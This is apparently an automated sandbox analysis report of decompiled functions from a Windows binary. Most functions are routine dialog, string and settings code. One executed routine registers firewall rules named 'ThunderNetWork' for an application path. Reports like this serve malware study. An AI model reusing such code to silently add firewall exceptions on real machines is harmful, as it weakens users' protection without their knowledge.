                                                                                                                                                                    				signed int _v80;
                                                                                                                                                                    				intOrPtr _v84;
                                                                                                                                                                    				intOrPtr _v92;
                                                                                                                                                                    				struct tagOFNA _v96;
                                                                                                                                                                    				intOrPtr _t23;
                                                                                                                                                                    				intOrPtr* _t33;
                                                                                                                                                                    				intOrPtr _t34;
                                                                                                                                                                    				wchar_t* _t38;
                                                                                                                                                                    
                                                                                                                                                                    				_t38 = __edi;
                                                                                                                                                                    				_t34 = __ecx;
                                                                                                                                                                    				_t33 = __ebx;
                                                                                                                                                                    				_t23 = 1;
                                                                                                                                                                    				if(__ebx != 0) {
                                                                                                                                                                    					_t23 =  *__ebx;
                                                                                                                                                                    				}
                                                                                                                                                                    				_v80 = _v80 & 0x00000000;
                                                                                                                                                                    				_v60 = _v60 & 0x00000000;
                                                                                                                                                                    				_v52 = _v52 & 0x00000000;
                                                                                                                                                                    				_v72 = _t23;
                                                                                                                                                                    				_v48 = _a8;
                                                                                                                                                                    				_v36 = _a12;
                                                                                                                                                                    				_v92 = _t34;
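                                                                                                                                                                    				_v96 = 0x58; // lStructSize: 0x58 (88) bytes, the 32-bit OPENFILENAMEW size
                                                                                                                                                                    				_v84 = _a4; // lpstrFilter
                                                                                                                                                                    				_v68 = _t38; // lpstrFile: caller-supplied output buffer
                                                                                                                                                                    				_v64 = 0x104; // nMaxFile: 260 characters (MAX_PATH)
                                                                                                                                                                    				_v44 = 0x80806; // Flags: OFN_EXPLORER | OFN_PATHMUSTEXIST | OFN_HIDEREADONLY | OFN_OVERWRITEPROMPT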
                                                                                                                                                                    				if(GetSaveFileNameW( &_v96) == 0) {
                                                                                                                                                                    					return 0;
                                                                                                                                                                    				} else {
                                                                                                                                                                    					if(_t33 != 0) {
                                                                                                                                                                    						 *_t33 = _v72;
                                                                                                                                                                    					}
                                                                                                                                                                    					wcscpy(_t38, _v68);
                                                                                                                                                                    					return 1;
                                                                                                                                                                    				}
                                                                                                                                                                    			}




















                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileNameSavewcscpy
                                                                                                                                                                    • String ID: X
                                                                                                                                                                    • API String ID: 3080202770-3081909835
                                                                                                                                                                    • Opcode ID: a0857a089f4deec4c1b474bd9ffc3361d4690667bb8dbb74d33b67a2b866139b
                                                                                                                                                                    • Instruction ID: 35274199d236effe9a648b535348c56afb13a0cf633c63e6ee0ccd6430c010a7
                                                                                                                                                                    • Opcode Fuzzy Hash: a0857a089f4deec4c1b474bd9ffc3361d4690667bb8dbb74d33b67a2b866139b
                                                                                                                                                                    • Instruction Fuzzy Hash: D80192B1D106599FDF10DFE9D88479EBBF4FB08319F10842AE815EA284DBB499098F54
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                    			E0040196B(void* __eax, void* __ecx, intOrPtr* __esi) {
                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                    				intOrPtr _t10;
                                                                                                                                                                    				void* _t14;
                                                                                                                                                                    				WINDOWPLACEMENT* _t15;
                                                                                                                                                                    				void* _t18;
                                                                                                                                                                    				struct HWND__* _t23;
                                                                                                                                                                    				intOrPtr* _t24;
                                                                                                                                                                    
                                                                                                                                                                    				_t24 = __esi;
                                                                                                                                                                    				_t18 = __eax;
                                                                                                                                                                    				_t1 = _t24 + 4; // 0x40d794
                                                                                                                                                                    				_t10 =  *_t1;
                                                                                                                                                                    				_v8 = _t10;
                                                                                                                                                                    				if(_t10 == 0) {
                                                                                                                                                                    					memset(__eax + 0x248, 0, 0x2c);
                                                                                                                                                                    				} else {
                                                                                                                                                                    					_t23 =  *(__eax + 0x208);
                                                                                                                                                                    					if(_t23 != 0) {
                                                                                                                                                                    						_t15 = __eax + 0x248;
                                                                                                                                                                    						_t15->length = 0x2c; // sizeof(WINDOWPLACEMENT): 44 bytes
                                                                                                                                                                    						GetWindowPlacement(_t23, _t15);
                                                                                                                                                                    					}
                                                                                                                                                                    				}
                                                                                                                                                                    				_t14 =  *((intOrPtr*)( *_t24 + 0xc))(L"WinPos", _t18 + 0x248, 0x2c);
                                                                                                                                                                    				if(_v8 == 0) {
                                                                                                                                                                    					_t14 = E004019D2(_t18);
                                                                                                                                                                    				}
                                                                                                                                                                    				return _t14;
                                                                                                                                                                    			}











                                                                                                                                                                    APIs
                                                                                                                                                                    • GetWindowPlacement.USER32(?,?,00000002,?,?,0040B20B,?,?,?,00000002,?,?,?,?,?,00000000), ref: 00401994
                                                                                                                                                                    • memset.MSVCRT ref: 004019A7
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: PlacementWindowmemset
                                                                                                                                                                    • String ID: WinPos
                                                                                                                                                                    • API String ID: 4036792311-2823255486
                                                                                                                                                                    • Opcode ID: 81be9ea41e6d398efb68a6c6dc4070ed39b463af53e59a3c9cc3062c0f115d68
                                                                                                                                                                    • Instruction ID: 309fedf9ece379f47234066dfb297f1f11f9bdd101b0f57d7b7a510f29a8e9ac
                                                                                                                                                                    • Opcode Fuzzy Hash: 81be9ea41e6d398efb68a6c6dc4070ed39b463af53e59a3c9cc3062c0f115d68
                                                                                                                                                                    • Instruction Fuzzy Hash: 3CF062B0610204EFEB54DF55C899FAE33E99F04700F54017AE9099F1D1EBB89D44C769
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 89%
                                                                                                                                                                    			E00407170(void* __ecx, void* __eflags, struct HINSTANCE__* _a4) {
                                                                                                                                                                    				void _v8198;
                                                                                                                                                                    				short _v8200;
                                                                                                                                                                    				int _t11;
                                                                                                                                                                    				int _t16;
                                                                                                                                                                    
                                                                                                                                                                    				E0040E340(0x2004, __ecx);
                                                                                                                                                                    				_t16 = 0;
                                                                                                                                                                    				_v8200 = 0;
                                                                                                                                                                    				memset( &_v8198, 0, 0x2000);
                                                                                                                                                                    				do {
                                                                                                                                                                    					_t11 = LoadStringW(_a4, _t16,  &_v8200, 0x1000);
                                                                                                                                                                    					if(_t11 > 0) {
                                                                                                                                                                    						_t11 = E00406E5E(_t16,  &_v8200);
                                                                                                                                                                    					}
                                                                                                                                                                    					_t16 = _t16 + 1;
                                                                                                                                                                    				} while (_t16 <= 0xffff);
                                                                                                                                                                    				return _t11;
                                                                                                                                                                    			}







                                                                                                                                                                    APIs
                                                                                                                                                                    • memset.MSVCRT ref: 00407194
                                                                                                                                                                    • LoadStringW.USER32(00412E48,00000000,?,00001000), ref: 004071AC
                                                                                                                                                                      • Part of subcall function 00406E5E: memset.MSVCRT ref: 00406E71
                                                                                                                                                                      • Part of subcall function 00406E5E: _itow.MSVCRT ref: 00406E7F
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: memset$LoadString_itow
                                                                                                                                                                    • String ID: ;t@
                                                                                                                                                                    • API String ID: 2363904170-3941608961
                                                                                                                                                                    • Opcode ID: abd66195640579f6e500643e127a0019a6d222aabc7e30448b3f27de400d40d8
                                                                                                                                                                    • Instruction ID: 51c9355171e471fb499396a2aa2e6012e16bb247b54c8a94724daa36fdc5b9b4
                                                                                                                                                                    • Opcode Fuzzy Hash: abd66195640579f6e500643e127a0019a6d222aabc7e30448b3f27de400d40d8
                                                                                                                                                                    • Instruction Fuzzy Hash: 5BF0A73290032829F724AA56DD4ABDB7B6CDF05754F0000B6BB0CF61D2D634AA50CBEE
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                    			E004073D0(wchar_t* __esi) {
                                                                                                                                                                    				wchar_t* _t2;
                                                                                                                                                                    				wchar_t* _t6;
                                                                                                                                                                    
                                                                                                                                                                    				_t6 = __esi;
                                                                                                                                                                    				E00405800(__esi);
                                                                                                                                                                    				_t2 = wcsrchr(__esi, 0x2e);
                                                                                                                                                                    				if(_t2 != 0) {
                                                                                                                                                                    					 *_t2 =  *_t2 & 0x00000000;
                                                                                                                                                                    				}
                                                                                                                                                                    				return wcscat(_t6, L"_lng.ini");
                                                                                                                                                                    			}





                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00405800: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,004073D6,00000000,00407289,?,00000000,00000208,?), ref: 0040580B
                                                                                                                                                                    • wcsrchr.MSVCRT ref: 004073D9
                                                                                                                                                                    • wcscat.MSVCRT ref: 004073EF
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileModuleNamewcscatwcsrchr
                                                                                                                                                                    • String ID: _lng.ini
                                                                                                                                                                    • API String ID: 383090722-1948609170
                                                                                                                                                                    • Opcode ID: ac25628e4bbd1f7f59230636c7e582e2e1885c094a405939c83156bbf3aedd80
                                                                                                                                                                    • Instruction ID: d66fa5373373d5564c67ff94d3685b1a514421eeb891155236f9d41770c1593b
                                                                                                                                                                    • Opcode Fuzzy Hash: ac25628e4bbd1f7f59230636c7e582e2e1885c094a405939c83156bbf3aedd80
                                                                                                                                                                    • Instruction Fuzzy Hash: AEC0125394561154E12132125C03B4F21448F06314F70003BFC06744C2ABFD6115C06F
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 90%
                                                                                                                                                                    			E004075A6(intOrPtr* __esi, void* __eflags) {
                                                                                                                                                                    				intOrPtr* _t33;
                                                                                                                                                                    				intOrPtr* _t42;
                                                                                                                                                                    
                                                                                                                                                                    				_t42 = __esi;
                                                                                                                                                                    				 *__esi = 0x410168;
                                                                                                                                                                    				 *((intOrPtr*)(__esi + 0x2f0)) = 0;
                                                                                                                                                                    				_t33 = E00405CF8(0x34c, __esi);
                                                                                                                                                                    				_push(0x14);
                                                                                                                                                                    				 *((intOrPtr*)(__esi + 0x33c)) = 0;
                                                                                                                                                                    				 *((intOrPtr*)(__esi + 0x348)) = 0;
                                                                                                                                                                    				 *((intOrPtr*)(__esi + 0x2dc)) = 0;
                                                                                                                                                                    				 *((intOrPtr*)(__esi + 0x2a0)) = 0;
                                                                                                                                                                    				 *((intOrPtr*)(__esi + 0x2f4)) = 0;
                                                                                                                                                                    				 *((intOrPtr*)(__esi + 0x2f8)) = 0xfff;
                                                                                                                                                                    				 *((intOrPtr*)(__esi + 0x20)) = 0;
                                                                                                                                                                    				 *((intOrPtr*)(__esi + 4)) = 0;
                                                                                                                                                                    				 *((intOrPtr*)(__esi + 0x2a8)) = 0;
                                                                                                                                                                    				 *((intOrPtr*)(__esi + 0x2ec)) = 1;
                                                                                                                                                                    				L0040E038();
                                                                                                                                                                    				if(_t33 == 0) {
                                                                                                                                                                    					_t33 = 0;
                                                                                                                                                                    				} else {
                                                                                                                                                                    					 *((intOrPtr*)(_t33 + 0xc)) = 0;
                                                                                                                                                                    					 *_t33 = 0;
                                                                                                                                                                    					 *((intOrPtr*)(_t33 + 4)) = 0;
                                                                                                                                                                    					 *((intOrPtr*)(_t33 + 0x10)) = 0x100;
                                                                                                                                                                    					 *((intOrPtr*)(_t33 + 8)) = 0;
                                                                                                                                                                    				}
                                                                                                                                                                    				_push(0x14);
                                                                                                                                                                    				 *((intOrPtr*)(_t42 + 8)) = _t33;
                                                                                                                                                                    				L0040E038();
                                                                                                                                                                    				if(_t33 == 0) {
                                                                                                                                                                    					_t33 = 0;
                                                                                                                                                                    				} else {
                                                                                                                                                                    					 *((intOrPtr*)(_t33 + 0xc)) = 0;
                                                                                                                                                                    					 *_t33 = 0;
                                                                                                                                                                    					 *((intOrPtr*)(_t33 + 4)) = 0;
                                                                                                                                                                    					 *((intOrPtr*)(_t33 + 0x10)) = 0x100;
                                                                                                                                                                    					 *((intOrPtr*)(_t33 + 8)) = 0;
                                                                                                                                                                    				}
                                                                                                                                                                    				_push(0x14);
                                                                                                                                                                    				 *((intOrPtr*)(_t42 + 0xc)) = _t33;
                                                                                                                                                                    				L0040E038();
                                                                                                                                                                    				if(_t33 == 0) {
                                                                                                                                                                    					_t33 = 0;
                                                                                                                                                                    				} else {
                                                                                                                                                                    					 *((intOrPtr*)(_t33 + 0xc)) = 0;
                                                                                                                                                                    					 *_t33 = 0;
                                                                                                                                                                    					 *((intOrPtr*)(_t33 + 4)) = 0;
                                                                                                                                                                    					 *((intOrPtr*)(_t33 + 0x10)) = 0x100;
                                                                                                                                                                    					 *((intOrPtr*)(_t33 + 8)) = 0;
                                                                                                                                                                    				}
                                                                                                                                                                    				_push(0x14);
                                                                                                                                                                    				 *((intOrPtr*)(_t42 + 0x10)) = _t33;
                                                                                                                                                                    				L0040E038();
                                                                                                                                                                    				if(_t33 == 0) {
                                                                                                                                                                    					_t33 = 0;
                                                                                                                                                                    				} else {
                                                                                                                                                                    					 *((intOrPtr*)(_t33 + 0xc)) = 0;
                                                                                                                                                                    					 *_t33 = 0;
                                                                                                                                                                    					 *((intOrPtr*)(_t33 + 4)) = 0;
                                                                                                                                                                    					 *((intOrPtr*)(_t33 + 0x10)) = 0x100;
                                                                                                                                                                    					 *((intOrPtr*)(_t33 + 8)) = 0;
                                                                                                                                                                    				}
                                                                                                                                                                    				 *((intOrPtr*)(_t42 + 0x14)) = _t33;
                                                                                                                                                                    				return _t42;
                                                                                                                                                                    			}






                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ??2@$memset
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1860491036-0
                                                                                                                                                                    • Opcode ID: c889cf0ef11d6ee6e19e236316b87eec8e7d4ceedb9811563d0e99fe09c66d75
                                                                                                                                                                    • Instruction ID: 6ad8090dc912b32accdf13bb09e5540cd70d669e40ded14db292eecac2a9bd8b
                                                                                                                                                                    • Opcode Fuzzy Hash: c889cf0ef11d6ee6e19e236316b87eec8e7d4ceedb9811563d0e99fe09c66d75
                                                                                                                                                                    • Instruction Fuzzy Hash: 7F31B2B0945B018ED7648F2BC484A56FAE8BF90310F2589AFD15ADB2B1D7F99440CF15
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                    			E00406264(signed int* __eax, void* __ecx, wchar_t* _a4) {
                                                                                                                                                                    				int _v8;
                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                    				void* __edi;
                                                                                                                                                                    				int _t32;
                                                                                                                                                                    				intOrPtr _t33;
                                                                                                                                                                    				intOrPtr _t36;
                                                                                                                                                                    				signed int _t48;
                                                                                                                                                                    				signed int _t58;
                                                                                                                                                                    				signed int _t59;
                                                                                                                                                                    				void** _t62;
                                                                                                                                                                    				void** _t63;
                                                                                                                                                                    				signed int* _t66;
                                                                                                                                                                    
                                                                                                                                                                    				_t66 = __eax;
                                                                                                                                                                    				_t32 = wcslen(_a4);
                                                                                                                                                                    				_t48 =  *(_t66 + 4);
                                                                                                                                                                    				_t58 = _t48 + _t32;
                                                                                                                                                                    				_v12 = _t58;
                                                                                                                                                                    				_t59 = _t58 + 1;
                                                                                                                                                                    				_v8 = _t32;
                                                                                                                                                                    				_t33 =  *((intOrPtr*)(_t66 + 0x14));
                                                                                                                                                                    				 *(_t66 + 4) = _t59;
                                                                                                                                                                    				_t62 = _t66 + 0x10;
                                                                                                                                                                    				if(_t59 != 0xffffffff) {
                                                                                                                                                                    					E0040562D(_t66, _t59, _t62, 2, _t33);
                                                                                                                                                                    				} else {
                                                                                                                                                                    					free( *_t62);
                                                                                                                                                                    				}
                                                                                                                                                                    				_t60 =  *(_t66 + 0x1c);
                                                                                                                                                                    				_t36 =  *((intOrPtr*)(_t66 + 0x18));
                                                                                                                                                                    				_t63 = _t66 + 0xc;
                                                                                                                                                                    				if( *(_t66 + 0x1c) != 0xffffffff) {
                                                                                                                                                                    					E0040562D(_t66 + 8, _t60, _t63, 4, _t36);
                                                                                                                                                                    				} else {
                                                                                                                                                                    					free( *_t63);
                                                                                                                                                                    				}
                                                                                                                                                                    				memcpy( *(_t66 + 0x10) + _t48 * 2, _a4, _v8 + _v8);
                                                                                                                                                                    				 *((short*)( *(_t66 + 0x10) + _v12 * 2)) =  *( *(_t66 + 0x10) + _v12 * 2) & 0x00000000;
                                                                                                                                                                    				 *( *_t63 +  *(_t66 + 0x1c) * 4) = _t48;
                                                                                                                                                                    				 *(_t66 + 0x1c) =  *(_t66 + 0x1c) + 1;
                                                                                                                                                                    				_t30 =  *(_t66 + 0x1c) - 1; // -1
                                                                                                                                                                    				return _t30;
                                                                                                                                                                    			}
















                                                                                                                                                                    APIs
                                                                                                                                                                    • wcslen.MSVCRT ref: 00406271
                                                                                                                                                                    • free.MSVCRT(?,00000000,?,00000001,?,?,?,004065A8,?,75144E00,?,00000000), ref: 00406294
                                                                                                                                                                      • Part of subcall function 0040562D: malloc.MSVCRT ref: 00405649
                                                                                                                                                                      • Part of subcall function 0040562D: memcpy.MSVCRT ref: 00405661
                                                                                                                                                                      • Part of subcall function 0040562D: free.MSVCRT(00000000,00000000,?,00406343,00000002,?,00000000,?,0040655F,75144E00,?,00000000), ref: 0040566A
                                                                                                                                                                    • free.MSVCRT(?,00000000,?,00000001,?,?,?,004065A8,?,75144E00,?,00000000), ref: 004062B7
                                                                                                                                                                    • memcpy.MSVCRT ref: 004062DB
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: free$memcpy$mallocwcslen
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 726966127-0
                                                                                                                                                                    • Opcode ID: 8efed790d319c7eb988e68133398513d2f98d8a3c3203aacdd794e8cb7bc8c6e
                                                                                                                                                                    • Instruction ID: 328e5c77b206eb01c5c4dd085cb03c2c4ac654035e51f3c9fb1ea2fb7f212fdc
                                                                                                                                                                    • Opcode Fuzzy Hash: 8efed790d319c7eb988e68133398513d2f98d8a3c3203aacdd794e8cb7bc8c6e
                                                                                                                                                                    • Instruction Fuzzy Hash: 3A21AEB1600704EFC730EF19D881C9AB7F9EF483247104A2EF856A7291D775B925CB58
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Executed Functions

                                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                                    			E00B11372(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                    				void* _v8;
                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                    				void* _v20;
                                                                                                                                                                    				void* _v24;
                                                                                                                                                                    				intOrPtr _v28;
                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                    				intOrPtr _v36;
                                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                                    				intOrPtr _t85;
                                                                                                                                                                    				intOrPtr _t87;
                                                                                                                                                                    				intOrPtr* _t88;
                                                                                                                                                                    				intOrPtr* _t89;
                                                                                                                                                                    				intOrPtr* _t90;
                                                                                                                                                                    				intOrPtr* _t95;
                                                                                                                                                                    				intOrPtr _t96;
                                                                                                                                                                    				intOrPtr* _t97;
                                                                                                                                                                    				intOrPtr _t98;
                                                                                                                                                                    				intOrPtr _t100;
                                                                                                                                                                    				intOrPtr* _t101;
                                                                                                                                                                    				intOrPtr* _t103;
                                                                                                                                                                    				intOrPtr* _t105;
                                                                                                                                                                    				intOrPtr* _t107;
                                                                                                                                                                    				intOrPtr* _t109;
                                                                                                                                                                    				intOrPtr* _t111;
                                                                                                                                                                    				intOrPtr* _t113;
                                                                                                                                                                    				intOrPtr* _t115;
                                                                                                                                                                    				intOrPtr _t118;
                                                                                                                                                                    				intOrPtr* _t119;
                                                                                                                                                                    				intOrPtr* _t121;
                                                                                                                                                                    				intOrPtr* _t123;
                                                                                                                                                                    				intOrPtr* _t125;
                                                                                                                                                                    				intOrPtr* _t127;
                                                                                                                                                                    				intOrPtr* _t129;
                                                                                                                                                                    				intOrPtr* _t131;
                                                                                                                                                                    				intOrPtr* _t133;
                                                                                                                                                                    				void* _t135;
                                                                                                                                                                    				void* _t163;
                                                                                                                                                                    				void* _t166;
                                                                                                                                                                    				signed int _t167;
                                                                                                                                                                    				intOrPtr* _t169;
                                                                                                                                                                    
                                                                                                                                                                    				_t167 = 0;
                                                                                                                                                                    				_v16 = 0x80004005;
                                                                                                                                                                    				_v24 = 0;
                                                                                                                                                                    				_v20 = 0;
                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                    				_v28 = E00B180F0(__edx, _a4);
                                                                                                                                                                    				_v32 = E00B180F0(__edx, "ThunderNetWork");
                                                                                                                                                                    				_t85 = E00B180F0(__edx, _a8);
                                                                                                                                                                    				_v36 = _t85;
                                                                                                                                                                    				__imp__CoInitializeEx(0, 2, _t166); // executed
                                                                                                                                                                    				_v40 = _t85;
                                                                                                                                                                    				if(_t85 == 0x80010106 || _t85 >= 0) {
                                                                                                                                                                    					_t87 = E00B11058( &_v24,  &_v24);
                                                                                                                                                                    					_v16 = _t87;
                                                                                                                                                                    					if(_t87 >= _t167) {
                                                                                                                                                                    						_t95 = _v24;
                                                                                                                                                                    						_t96 =  *((intOrPtr*)( *_t95 + 0x48))(_t95,  &_v20);
                                                                                                                                                                    						_v16 = _t96;
                                                                                                                                                                    						if(_t96 >= _t167) {
                                                                                                                                                                    							_t97 = _v24;
                                                                                                                                                                    							_t98 =  *((intOrPtr*)( *_t97 + 0x1c))(_t97,  &_v12);
                                                                                                                                                                    							_v16 = _t98;
                                                                                                                                                                    							if(_t98 >= _t167) {
                                                                                                                                                                    								if((_v12 & 0x00000004) != 0 && _v12 != 4) {
                                                                                                                                                                    									_v12 = _v12 ^ 0x00000004;
                                                                                                                                                                    								}
                                                                                                                                                                    								_t169 = __imp__CoCreateInstance;
                                                                                                                                                                    								_t100 =  *_t169(0xb1db2c, _t167, 1, 0xb1db3c,  &_v8, _t163, _t135); // executed
                                                                                                                                                                    								_v16 = _t100;
                                                                                                                                                                    								if(_t100 >= 0) {
                                                                                                                                                                    									_t101 = _v8;
                                                                                                                                                                    									 *((intOrPtr*)( *_t101 + 0x20))(_t101, _v28);
                                                                                                                                                                    									_t103 = _v8;
                                                                                                                                                                    									 *((intOrPtr*)( *_t103 + 0x28))(_t103, _v32);
                                                                                                                                                                    									_t105 = _v8;
                                                                                                                                                                    									 *((intOrPtr*)( *_t105 + 0x30))(_t105, _v36);
                                                                                                                                                                    									_t107 = _v8;
                                                                                                                                                                    									 *((intOrPtr*)( *_t107 + 0x40))(_t107, 6);
                                                                                                                                                                    									_t109 = _v8;
                                                                                                                                                                    									 *((intOrPtr*)( *_t109 + 0x98))(_t109, _v12);
                                                                                                                                                                    									_t111 = _v8;
                                                                                                                                                                    									 *((intOrPtr*)( *_t111 + 0xa8))(_t111, 1);
                                                                                                                                                                    									_t113 = _v8;
                                                                                                                                                                    									 *((intOrPtr*)( *_t113 + 0x88))(_t113, 0xffffffff);
                                                                                                                                                                    									_t115 = _v20;
                                                                                                                                                                    									 *((intOrPtr*)( *_t115 + 0x20))(_t115, _v8);
                                                                                                                                                                    									_t118 =  *_t169(0xb1db2c, 0, 1, 0xb1db3c,  &_v8);
                                                                                                                                                                    									_v16 = _t118;
                                                                                                                                                                    									if(_t118 >= 0) {
                                                                                                                                                                    										_t119 = _v8;
                                                                                                                                                                    										 *((intOrPtr*)( *_t119 + 0x20))(_t119, _v28);
                                                                                                                                                                    										_t121 = _v8;
                                                                                                                                                                    										 *((intOrPtr*)( *_t121 + 0x28))(_t121, _v32);
                                                                                                                                                                    										_t123 = _v8;
                                                                                                                                                                    										 *((intOrPtr*)( *_t123 + 0x30))(_t123, _v36);
                                                                                                                                                                    										_t125 = _v8;
                                                                                                                                                                    										 *((intOrPtr*)( *_t125 + 0x40))(_t125, 0x11);
                                                                                                                                                                    										_t127 = _v8;
                                                                                                                                                                    										 *((intOrPtr*)( *_t127 + 0x98))(_t127, _v12);
                                                                                                                                                                    										_t129 = _v8;
                                                                                                                                                                    										 *((intOrPtr*)( *_t129 + 0xa8))(_t129, 1);
                                                                                                                                                                    										_t131 = _v8;
                                                                                                                                                                    										 *((intOrPtr*)( *_t131 + 0x88))(_t131, 0xffffffff);
                                                                                                                                                                    										_t133 = _v20;
                                                                                                                                                                    										_v16 =  *((intOrPtr*)( *_t133 + 0x20))(_t133, _v8);
                                                                                                                                                                    									}
                                                                                                                                                                    								}
                                                                                                                                                                    								_t167 = 0;
                                                                                                                                                                    							}
                                                                                                                                                                    						}
                                                                                                                                                                    					}
                                                                                                                                                                    				}
                                                                                                                                                                    				_t88 = _v8;
                                                                                                                                                                    				if(_t88 != _t167) {
                                                                                                                                                                    					 *((intOrPtr*)( *_t88 + 8))(_t88);
                                                                                                                                                                    				}
                                                                                                                                                                    				_t89 = _v20;
                                                                                                                                                                    				if(_t89 != _t167) {
                                                                                                                                                                    					 *((intOrPtr*)( *_t89 + 8))(_t89);
                                                                                                                                                                    				}
                                                                                                                                                                    				_t90 = _v24;
                                                                                                                                                                    				if(_t90 != _t167) {
                                                                                                                                                                    					 *((intOrPtr*)( *_t90 + 8))(_t90);
                                                                                                                                                                    				}
                                                                                                                                                                    				if(_v40 >= _t167) {
                                                                                                                                                                    					__imp__CoUninitialize(); // executed
                                                                                                                                                                    				}
                                                                                                                                                                    				return _v16;
                                                                                                                                                                    			}













































                                                                                                                                                                    APIs
                                                                                                                                                                    • _com_util::ConvertStringToBSTR.COMSUPP ref: 00B11391
                                                                                                                                                                    • _com_util::ConvertStringToBSTR.COMSUPP ref: 00B1139E
                                                                                                                                                                      • Part of subcall function 00B180F0: lstrlenA.KERNEL32(?,101C184A,?,80004005,?,000000FE,?,00B11112,00000000), ref: 00B18137
                                                                                                                                                                      • Part of subcall function 00B180F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,80004005,?,000000FE,?,00B11112,00000000), ref: 00B1814D
                                                                                                                                                                      • Part of subcall function 00B180F0: GetLastError.KERNEL32(?,80004005,?,000000FE,?,00B11112,00000000), ref: 00B1815C
                                                                                                                                                                      • Part of subcall function 00B180F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,000000FE,?,00B11112,00000000), ref: 00B181EB
